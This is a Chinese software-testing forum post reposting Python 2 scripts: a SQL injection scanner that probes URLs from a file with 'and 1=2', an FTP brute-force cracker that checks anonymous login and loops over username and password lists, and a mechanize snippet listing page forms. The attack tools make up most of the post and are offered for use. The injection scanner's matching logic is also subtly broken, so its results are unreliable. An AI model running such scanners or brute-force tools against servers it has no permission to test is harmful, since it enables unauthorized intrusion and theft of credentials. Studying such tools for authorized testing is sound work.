51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 1748|回复: 0
打印 上一主题 下一主题

[资料] python注入点查找工具

[复制链接]
  • TA的每日心情
    擦汗
    前天 09:04
  • 签到天数: 1047 天

    连续签到: 5 天

    [LV.10]测试总司令

    跳转到指定楼层
    1#
    发表于 2017-8-31 13:57:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    python SQL InjectionScaner
    1. #!/usr/bin/python
    2. #-*-coding=utf-8-*-
    3. #Author:@xfk
    4. #blog:@blog.sina.com.cn/kaiyongdeng
    5. #Date:@2012-05-07
    6. #Example site:@http://www.apostilando.com/pagina.php?cod=1
    7. #将要扫描的网站写入当前目录文件中。python xxx.py  xxx.txt
    复制代码


    1. import urllib
    2. import os
    3. import sys

    4. if os.name == "nt":
    5.     os.system("cls")
    6. else:
    7.     os.system("clear")
    8. def usage():
    9.     print """
    10.     =================SQL INJECTION=====================
    11.     Usage:python %s %s
    12.     """ %(sys.argv[0],sys.argv[1])
    13.    
    14. def scanner(url):
    15.     try:
    16.         page = urllib.urlopen(url).read()
    17.     except:
    18.         print "[-]Error!!!\n"
    复制代码
    如果一个网站存在SQL注入的话就,当你使用基本的尝试方法去测试时页面会出现如下报错。
    1. sqls = ("mysql_result(): supplied argument is not a valid MySQL result resource in",
    2.             "[Microsoft][ODBC SQL Server Driver][SQL Server]",
    3.             "Warning:ociexecute",
    4.             "Warning: pq_query[function.pg-query]:")
    5.     i=0
    6.     page = str(page.lower())
    7.     while i<len(sqls):
    8.         sql = str(sqls[i]).lower()
    9.         if page.find(sql[i]) == -1:
    10.             check=0
    11.         else:
    12.             check=1
    13.         i+=1
    14.     if check == 0:
    15.         print "[-]"+url+" <No Vulneravel>"
    16.     else:
    17.         print "[+]"+url+" <Vulneravel>"
    18.         
    19. def main(args):
    20.     if len(args)!=1:
    21.         usage()
    22.         print "\t[-]Mode to use: %s <File>\n" % sys.argv[0]
    23.         print "\t[-]Example: %s Site.txt\n" % sys.argv[0]
    24. #        print sys.argv[0],sys.argv[1],len(args)
    25.         sys.exit(0)
    26.     usage()
    27.     try:
    28.         f = open(str(sys.argv[1]),"r")
    29.         urls = f.readlines()
    30. #        print urls
    31.     except:
    32.         print "[+]Error to open the file "+sys.argv[1]+""
    33.         return(-1)
    34.     f.close()
    35.     i=0
    36.     while i<len(urls):
    37.         if urls[i].find("http://") == -1:
    38.             urls[i] = "http://" + urls[i]
    39.         urls[i] = urls[i].replace("\n","")
    40. #        利用基本放法进行测试,如:and 1=1,and 1=2,’,查看是否出现sqls中的错误信息
    41.         a = scanner(urls[i]+"and 1=2")
    42.         i+=1
    43.         
    44. if __name__ == "__main__":
    45.     main(sys.argv[1:])
    复制代码
    FTP Brute Forcing Tool——Python FTP暴力破解工具

    在当前目录下简历你自己的用户名和密码字典,就能破解出用户名和密码。
    参考链接:
    1. #!/usr/bin/env python
    2. #-*-coding = utf-8-*-
    3. #author:@xfk
    4. #blog:@blog.sina.com.cn/kaiyongdeng
    5. #date:@2012-05-08

    6. import sys, os, time   
    7. from ftplib import FTP

    8. docs = """
    9.     [*] This was written for educational purpose and pentest only. Use it at your own risk.
    10.     [*] Author will be not responsible for any damage!
    11.     [*] Toolname        : ftp_bf.py
    12.     [*] Coder           :
    13.     [*] Version         : 0.1
    14.     [*] ample of use  : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    15.     """

    16. if sys.platform == 'linux' or sys.platform == 'linux2':
    17.     clearing = 'clear'
    18. else:
    19.     clearing = 'cls'
    20. os.system(clearing)

    21. R = "\033[31m";
    22. G = "\033[32m";
    23. Y = "\033[33m"
    24. END = "\033[0m"

    25. def logo():
    26.     print G+"\n         |---------------------------------------------------------------|"
    27.     print "        |                                                               |"
    28.         print "        |          blog.sina.com.cn/kaiyongdeng                    |"
    29.         print "        |            08/05/2012 ftp_bf.py v.0.1                     |"
    30.     print "        |            FTP Brute Forcing Tool                       |"
    31.         print "        |                                                               |"
    32.         print "        |---------------------------------------------------------------|\n"
    33.     print "    \n         [-] %s\n" % time.strftime("%X")
    34.     print docs+END
    35.    
    36. def help():
    37.         print R+"[*]-t, --target            ip/hostname     <> Our target"
    38.     print "[*]-u, --usernamelist      usernamelist    <> usernamelist path"
    39.     print "[*]-p, --passwordlist      passwordlist    <> passwordlist path"
    40.     print "[*]-h, --help              help            <> print this help"
    41.     print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END
    42.     sys.exit(1)

    43. def bf_login(hostname,username,password):
    44. #    sys.stdout.write("\r[!]Checking : %s " % (p))
    45. #    sys.stdout.flush()
    46.     try:
    47.         ftp = FTP(hostname)
    48.         ftp.login(username, password)
    49.         ftp.retrlines('list')
    50.         ftp.quit()
    51.         print Y+"\n[!] w00t,w00t!!! We did it ! "
    52.         print "[+] Target : ",hostname, ""
    53.         print "[+] User : ",username, ""
    54.         print "[+] Password : ",password, ""+END
    55.         return 1
    56. #        sys.exit(1)
    57.     except Exception, e:
    58.         pass
    59.     except KeyboardInterrupt:
    60.         print R+"\n[-] Exiting ...\n"+END
    61.         sys.exit(1)

    62. def anon_login(hostname):
    63.     try:
    64.         print G+"\n[!] Checking for anonymous login.\n"+END
    65.         ftp = FTP(hostname)
    66.         ftp.login()
    67.         ftp.retrlines('LIST')
    68.         print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END
    69.         
    70.         ftp.quit()
    71.     except Exception, e:
    72.         print R+"\n[-] Anonymous login failed...\n"+END
    73.         pass
    74. def main():
    75.     logo()
    76.     try:
    77.         for arg in sys.argv:
    78.             if arg.lower() == '-t' or arg.lower() == '--target':
    79.                 hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
    80.             elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
    81.                 usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
    82.             elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
    83.                 passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
    84.             elif arg.lower() == '-h' or arg.lower() == '--help':
    85.                 help()
    86.             elif len(sys.argv) <= 1:
    87.                 help()
    88.     except:
    89.         print R+"[-]Cheak your parametars input\n"+END
    90.         help()
    91.     print G+"[!] BruteForcing target ..."+END
    92.     anon_login(hostname)
    93. #    print "here is ok"
    94. #    print hostname
    95.     try:   
    96.         usernames = open(usernamelist, "r")
    97.         user = usernames.readlines()
    98.         count1 = 0
    99.         while count1 < len(user):
    100.             user[count1] = user[count1].strip()
    101.             count1 +=1
    102.     except:
    103.         print R+"\n[-] Cheak your usernamelist path\n"+END
    104.         sys.exit(1)
    105. #    print "here is ok ",usernamelist,passwordlist
    106.     try:
    107.         passwords = open(passwordlist, "r")
    108.         pwd = passwords.readlines()
    109.         count2 = 0
    110.         while count2 < len(pwd):
    111.             pwd[count2] = pwd[count2].strip()
    112.             count2 +=1
    113.     except:
    114.         print R+"\n[-] Check your passwordlist path\n"+END
    115.         sys.exit(1)

    116.     print G+"\n[+] Loaded:",len(user),"usernames"
    117.     print "\n[+] Loaded:",len(pwd),"passwords"
    118.     print "[+] Target:",hostname
    119.     print "[+] Guessing...\n"+END

    120.     for u in user:
    121.         for p in pwd:
    122.             result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
    123.             if result != 1:
    124.                 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
    125.             else:
    126.                 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
    127.     if not result :
    128.         print R+"\n[-]There is no username ans password enabled in the list."
    129.         print "[-]Exiting...\n"+END

    130. if __name__ == "__main__":
    131.     main()
    复制代码


    牛逼的python模块—mechanize今天又找到了一个好使的,NB的python模块哦,大家来看看吧,比python自家的urllib和urllib2更好使撒!!!
    连接:http://wwwsearch.sourceforge.net/mechanize/
    下面是mechanize的有点,看了怎么能不心动呢!!!!????

    有时间写个应用,敬请期待,搞起。。。。。。
    1. •        mechanize.Browser and mechanize.UserAgentBase implement the interface of urllib2.OpenerDirector, so:
    2. o        any URL can be opened, not just http:
    3. o        mechanize.UserAgentBase offers easy dynamic configuration of user-agent features like protocol, cookie, redirection and robots.txt handling, without having to make a new OpenerDirector each time, e.g. by calling build_opener().
    4. •        Easy HTML form filling.
    5. •        Convenient link parsing and following.
    6. •        Browser history (.back() and .reload() methods).
    7. •        The Referer HTTP header is added properly (optional).
    8. •        Automatic observance of robots.txt.
    9. •        Automatic handling of HTTP-Equiv and Refresh.
    复制代码
    提取网页表单信息#!/usr/bin/env python
    #-*-coding = utf-8-*-
    import mechanize
    import sys


    1. br = mechanize.Browser()
    2. response = br.open(sys.argv[1])
    3. for form in br.forms():
    4.     print "name:[%r] id:[%r] action:[%s]" %(form.name, form.attrs.get('id'), form.action)
    5.     print "Controls: "
    6.     for control in form.controls:
    7.         print '    ', control.type, control.name, repr(control.value)
    8.     print(" ")
    复制代码



    这是我早OSChina上看到的最简单的利用python提取网页表单信息的脚本,短小精悍。关键在于它的mechanize模块,网上对这个模块的介绍很少,全靠自己慢慢摸索!!!
    在网上找到不少类似相关的网站讲这些网页表单信息提取的东东,大家有兴趣可以研究研究撒!!!
    http://twill.idyll.org/python-api.html
    http://search.cpan.org/~jesse/WW ... ib/WWW/Mechanize.pm


    转摘至 http://zhan.renren.com/pythonfocus?checked=true


    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?(注-册)加入51Testing

    x
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏
    回复

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-17 17:27 , Processed in 0.064058 second(s), 24 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表